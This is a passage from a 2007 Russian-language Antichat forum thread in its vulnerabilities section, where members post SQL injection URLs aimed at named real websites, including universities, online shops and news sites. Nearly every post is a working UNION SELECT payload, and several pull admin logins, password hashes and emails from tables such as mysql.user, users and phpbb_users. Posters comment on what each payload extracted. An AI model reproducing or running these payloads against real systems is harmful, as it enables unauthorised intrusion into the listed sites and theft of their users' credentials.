ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #771  
Старый 08.03.2007, 23:07
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
Talking

Последние на сегодня:

Код:
http://physics.com.ua/news_interest.php?id=-1+union+select+1,user(),3,4,null,null,7,8,version()/*
Код:
http://www.davisvisitor.com/sub.php?id=-1+union+select+1,2,3,4,version(),user()/*
Код:
http://www.barspb.ru/galleries.php?id=-1+union+select+user(),2/*
 
Ответить с цитированием

  #772  
Старый 08.03.2007, 23:07
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Код:
http://www.xmlhack.com/read.php?item=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+INFORMATION_SCHEMA.TABLES/*
 
Ответить с цитированием

  #773  
Старый 09.03.2007, 01:19
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Код:
http://www.linspire.com/linspire_letter_archives.php?id=-40+UNION+SELECT+1,version(),3,4/*
 
Ответить с цитированием

  #774  
Старый 09.03.2007, 01:36
Аватар для SWAT
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

http://m-l.com.ua/issues.php?aid=-689+union+select+1,2,3,4,5,6,7,8,9/*

http://www.microchip.by/info.php?id=-1106+union+select+1,2,3,VERSION(),5/*

http://zvisti.com.ua/info.php?id=-3461+union+select+1,2,3,4,5,table_name,7,8,9,10,11 ,12+from+INFORMATION_SCHEMA.TABLES/*

http://www.science.oas.org/INFOCYT/info.php?id=-2526+union+select+1,2,3,4,password,6+from+mysql.us er/*

http://www.slavneft.ru/press/info.php?id=-420+union+select+1,2,mail,id,5,6,7,8,9+from+mail/*

http://www.worstpreviews.com/review.php?id=-393+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40/*

http://www.dvdfuture.com/review.php?id=-805+union+select+1,2,concat(user_email,char(58),us er_icq,char(58),user_password),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19+from+phpbb_users+limit+1,1/*

http://planeta.sch2.net/ship/review.php?id=-16+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.derives.net/reviews/review.php?id=-1535+union+select+1,2,3,4,5,6,7,8,9/*

http://www.guitarnoise.com/review.php?id=-375+union+select+1,2,3,4,5,6,7,8/*

http://www.storing-zine.net/review.php?id=-242+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17/*

Последний раз редактировалось SWAT; 09.03.2007 в 01:50..
 
Ответить с цитированием

  #775  
Старый 09.03.2007, 01:43
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

SWAT, www.partytown.ru // http://www.tsb.kz я уже выкладывал.
 
Ответить с цитированием

  #776  
Старый 09.03.2007, 01:49
Аватар для SWAT
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Цитата:
Сообщение от n0ne  
SWAT, www.partytown.ru // http://www.tsb.kz я уже выкладывал.
за всем проследить не могу....подправил месагу))
 
Ответить с цитированием

  #777  
Старый 09.03.2007, 02:03
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

SWAT, да всё нормально) у всех бывает

Код:
http://www.williams.edu/admin/news/releases.php?id=-1106+UNION+SELECT+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+from+editors+limit+1,1/*
Код:
http://www.williams.edu/admin/news/releases.php?id=-1106+UNION+SELECT+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+from+editors/*
странно с лимитами получилось, без лимита одно, с лимитом 1,1 другое, лимиты до 50 перебрал - пусто ну вообщем вот.

Код:
http://www.lssu.edu/degrees/degree.php?id=-5066+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12+from+information_schema.columns/*
Код:
http://www.lssu.edu/degrees/degree.php?id=-5066+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+from+information_schema.tables/*
посмотрел все таблицы\колонки - ничё дельного.

Последний раз редактировалось n0ne; 09.03.2007 в 02:16..
 
Ответить с цитированием

  #778  
Старый 09.03.2007, 06:47
Аватар для VampiRUS
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

_http://uptime.ru/content.php?what=preleases&id=-1+UNION+SELECT+1,0x4C4F47494E3A4D7953514C5F6861736 82870617373776F7264293A655F6D61696C,concat(login,c har(58),password,char(58),email),4,5,6,7+from+user s+limit+8541,1/*
 
Ответить с цитированием

  #779  
Старый 09.03.2007, 10:54
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

какой-то интернет-магазин...
Код:
http://www.nordiz.ru/tovar.php?tovar_id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat(user,0x3a,password),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+from+mysql.user+limit+1,1/*
логин и mysql-хеш админа.

ps: 57 столбцов, ужс

//upd:

Код:
http://www.oxid.ru/mp3/mp3.php?id=-1+union+select+1,concat(login,0x3a,pass,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+users+limit+1,1/*
очередной mp3шник, на этот раз - бесплатный
формат данных login:рass:email

&&upd2:
Код:
http://www.eventor.ru/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8/*
название не подобрал =\

Последний раз редактировалось n1†R0x; 09.03.2007 в 11:32..
 
Ответить с цитированием

  #780  
Старый 09.03.2007, 11:42
Аватар для VampiRUS
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

Наевеяно n1†R0x
Код:
_http://www.globalmoney.ru/affiliate/order.php?tovar_id=-1+union+select+1,concat(login,0x3A,password,0x3A,email),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+users/*
Код:
http://www.qteki.ru/tovar.php?tovar_id=-1+union+select+1,concat(user,0x3A,password),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+from+mysql.user+limit+1,1/*
109 столбцов))

прикольный такой параметр
Код:
http://pda.nordiz.ru/tovar.php?tovar_id=-1+union+select+1,2,3,concat(user,0x3A,password),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+mysql.user+limit+1,1/*

Последний раз редактировалось VampiRUS; 09.03.2007 в 11:50..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ